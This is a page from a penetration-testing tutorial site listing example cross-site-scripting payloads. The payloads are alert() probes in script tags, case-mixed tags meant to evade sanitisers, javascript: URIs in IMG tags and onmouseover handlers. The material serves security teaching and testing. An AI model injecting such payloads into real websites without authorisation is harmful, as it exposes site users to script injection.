SMK Muhammadiyah 2 Palembang
  • Introducation
  • The Basics
    • Basics of linux
    • Bash-scripting
    • Vim - Text Editor
    • Nano - Text Editor
  • Windows
    • Basics of windows
    • PowerShell
    • CMD - Windows commands
  • Scripting With Python
    • Python fundamentals
      • Useful Scripts
    • Transferring Files
      • Transferring Files on Linux
      • Transferring Files to Windows
    • Firewalls
  • Recon and Information Gathering Phase
    • Passive information gathering
    • Identify IP-addresses and Subdomains
      • Dorking Find Subdomains
      • Find Subdomains
      • DNS Basics
      • DNS Zone Transfer Attack
      • Identifying People
      • Search Engine Discovery
      • Active information gathering
      • Port Scanning
  • Vulnerability analysis
    • Server-side Vulnerabilities
      • Port knocking
    • HTTP - Web Vulnerabilities
      • Web-services
      • Common web-services
        • WAF - Web application firewall
          • WAF - Web application firewall
          • Attacking the System
          • Local File Inclusion (LFI)
          • Remote File Inclusion
          • Find hidden files and directories
          • SQL-injections
          • Nosql-injections
          • XML External Entity Attack
          • Bypass File Upload Filtering
          • Exposed Version Control
          • Failure to Restrict URL Access
    • Attacking the user
      • Clickjacking
      • Broken Authentication or Session Management
      • Text/content-injection
      • Subdomain Takeover
      • Cross Site Request Forgery
      • Cross-site-scripting
        • Examples
      • Browser vulnerabilities
      • Java applet
      • Automated Vulnerability Scanners
    • Exploiting
      • Social Engineering - Phishing
      • Default Layout of Apache on Different Versions
      • Shell
      • Webshell
      • Generate shellcode
      • Editing exploits
      • Compiling windows exploits
    • Post Exploitation
      • Spawning shells
      • Meterpreter shell for post-exploitation
      • Privilege Escalation
      • Privilege Escalation Windows
      • Escaping Restricted Shell
      • Bypassing antivirus
      • Loot and Enumerate
        • Loot Windows
        • Loot Linux
      • Persistence - Rootkit - Backdoor
      • Cover your tracks
  • Password Cracking
    • Generate custom wordlist
    • Offline password cracking
    • Online password cracking
    • Pass the hash - reusing hashes
  • Pivoting - Port forwarding - Tunneling
    • Pivoting
  • Network traffic
    • Arp-spoofing - Sniffing traffic
      • SSL-strip
    • DNS-spoofing
    • Wireshark
  • Wifi
    • WPS
    • WEP
  • Physical access to machine
  • Literature
Powered by GitBook
On this page
  1. Vulnerability analysis
  2. Attacking the user
  3. Cross-site-scripting

Examples

PreviousCross-site-scriptingNextBrowser vulnerabilities

Last updated 2 years ago

This is a good list:

No security

<script>alert(1)</script>

Imagine that the server sanitizes <script>. To bypass that we can use: <SCrIpt>alert(2)</ScRiPt> <script type=text/javascript>alert(2)</script>

Using the IMG-tag

<IMG SRC="javascript:alert('XSS');">
<IMG SRC=javascript:alert('XSS')>
<IMG SRC=JaVaScRiPt:alert('XSS')>
<IMG SRC=javascript:alert("XSS")>
<IMG onmouseover="alert('xxs')">

Onmouseover

<a onmouseover="alert(2)">d</a>

https://www.linkedin.com/pulse/20140812222156-79939846-xss-vectors-you-may-need-as-a-pen-tester